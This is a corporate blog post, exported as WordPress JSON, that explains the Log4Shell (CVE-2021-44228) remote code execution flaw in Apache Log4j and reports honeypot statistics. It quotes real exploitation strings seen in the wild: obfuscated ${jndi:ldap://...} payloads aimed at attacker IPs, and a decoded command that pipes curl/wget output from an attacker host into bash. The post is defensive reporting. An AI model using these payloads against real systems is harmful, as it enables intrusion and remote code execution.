{"id":2702,"date":"2021-12-27T12:59:31","date_gmt":"2021-12-27T07:29:31","guid":{"rendered":"https:\/\/www.urolime.com\/blogs\/ae\/?p=2702"},"modified":"2021-12-27T12:59:31","modified_gmt":"2021-12-27T07:29:31","slug":"actively-exploited-log4j-may-be-the-worst-software-vulnerability","status":"publish","type":"post","link":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/","title":{"rendered":"Actively Exploited Log4j May Be The Worst Software Vulnerability"},"content":{"rendered":"

Last week, Information Security Media announced that it discovered the critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity 10\/10). This threat, also known as Log4Shell or LogJam, is a vulnerability of the Remote Code Execution (RCE) class. An attacker who successfully exploited this vulnerability on a vulnerable server could execute arbitrary code and gain complete control over the system. It is dangerous because of the published proof-of-concept and easy-to-use vulnerabilities.<\/span><\/p>\n

CVE-2021-44228 Technical details<\/strong><\/p>\n

CVE-2021-44228 Vulnerability remote code execution found in the Apache Log4j library- a part of the Apache Logging project. The vulnerability is likely to be exploited when a product uses a vulnerable version of this library with a JNDI module for logging purposes. Almost all versions of Log4j are vulnerable from 2.0-beta9 to 2.14.1.<\/span><\/p>\n

Log4j contains a search mechanism to perform queries using special string format syntax. It means that different parameters can be queried, for example, the version of the Java environment via $ {java: version}. Then enter the JNDI key in the string, and the search engine will use the JNDI API. By default, all requests are made with the prefix java: comp \/ env \/. However, the author implemented the ability to use a custom prefix with the colon for the keys. Here are the weak points. If jndi:ldap:\/\/is used as the key the request goes to the specified LDAP server. Other communication protocols such as LDAPS, DNS, and RMI are also used.<\/span><\/p>\n

Security experts successfully monitored telemetry for activity exploiting vulnerability CVE-2021-44228 and extracted the URL used by the attacker. Important examples are below.<\/span><\/p>\n

${jndi%3aldap%3a\/\/0ky8rj5089x9qx7tq8djb3rpp.canarytokens[.]com\/a}<\/span><\/p>\n

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}:\/\/${hostName:user:env}.c6340b92vtc00002scfggdpcz9eyyyyyd.interactsh[.]com}<\/span><\/p>\n

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}:\/\/195.54.160[.]149:12344\/Basic\/Command\/Base64\/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC80NS41Ni45Mi4yMjk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNDUuNTYuOTIuMjI5OjgwKXxiYXNo}<\/span><\/p>\n

${jndi:ldap:\/\/5819.u837r4g5oolsy8hudoz24c15nwtohd.burpcollaborator[.]net\/a}<\/span><\/p>\n

${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}\/\/62.182.80.168:1389\/pien3m}<\/span><\/p>\n

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${lower:d}${lower:a}${lower:p}}:\/\/67.205.191.102:1389\/koejir}}<\/span><\/p>\n

Based on the URL analysis they found how attackers attempted to embed payloads in rare fields such as; user agents, data fields, and URI parameters. Uploading into this box is an evasive technique that bypasses the simple lockdown measures that many organizations use to protect themself against this type of attack.<\/span><\/p>\n

The following excerpt shows an exploitation attempt in HTTP server logs:<\/strong><\/p>\n

45.155.205[.]233:53590 server:80 – [10\/Dec\/2021:13:25:10 +0000] “GET \/ HTTP\/1.1” 200 1671 “-“${jndi:ldap:\/\/45.155.205[.]233:12344\/Basic\/Command\/Base64\/[BASE64-code-removed]}”<\/span><\/p>\n

The Base64 string in the above query is translated to:<\/span><\/p>\n

(curl -s 45.155.xxx.xxx:5874\/server:80||wget -q -O- 45.155.xxx.xxx:5874\/server:80) | bash<\/span><\/p>\n

This code takes the malicious script from 45.155.xxx.xxx then runs it with bash.<\/span><\/p>\n

Thus, the remote server controlled by the attacker can send objects back to the vulnerable server to execute arbitrary code on the system to reveal sensitive data. The attacker must send a special string through a mechanism that writes this string to a log file that is processed by the Log4j library. This can be done as a simple HTTP request sent through a web form, data field, etc., or some other way to interact with the server-side logging.<\/span><\/p>\n

CVE-2021-44228 Operating statistics<\/strong><\/p>\n

Honeypot data shows a total of 8,646 exploitation attempts between December 10 and 12 with 1,700 malicious requests per hour on December 11 at 12:00 GMT.<\/span><\/p>\n

Impact<\/strong><\/p>\n

The Log4j 2 library is widely used in Java enterprise software. This method of distribution makes it difficult to measure the effect. As with other high-profile vulnerabilities like Heartbleed and Shellshock, we believe more vulnerable products will be discovered in the coming weeks. To the best of our knowledge, at least the following software may be impacted:<\/span><\/p>\n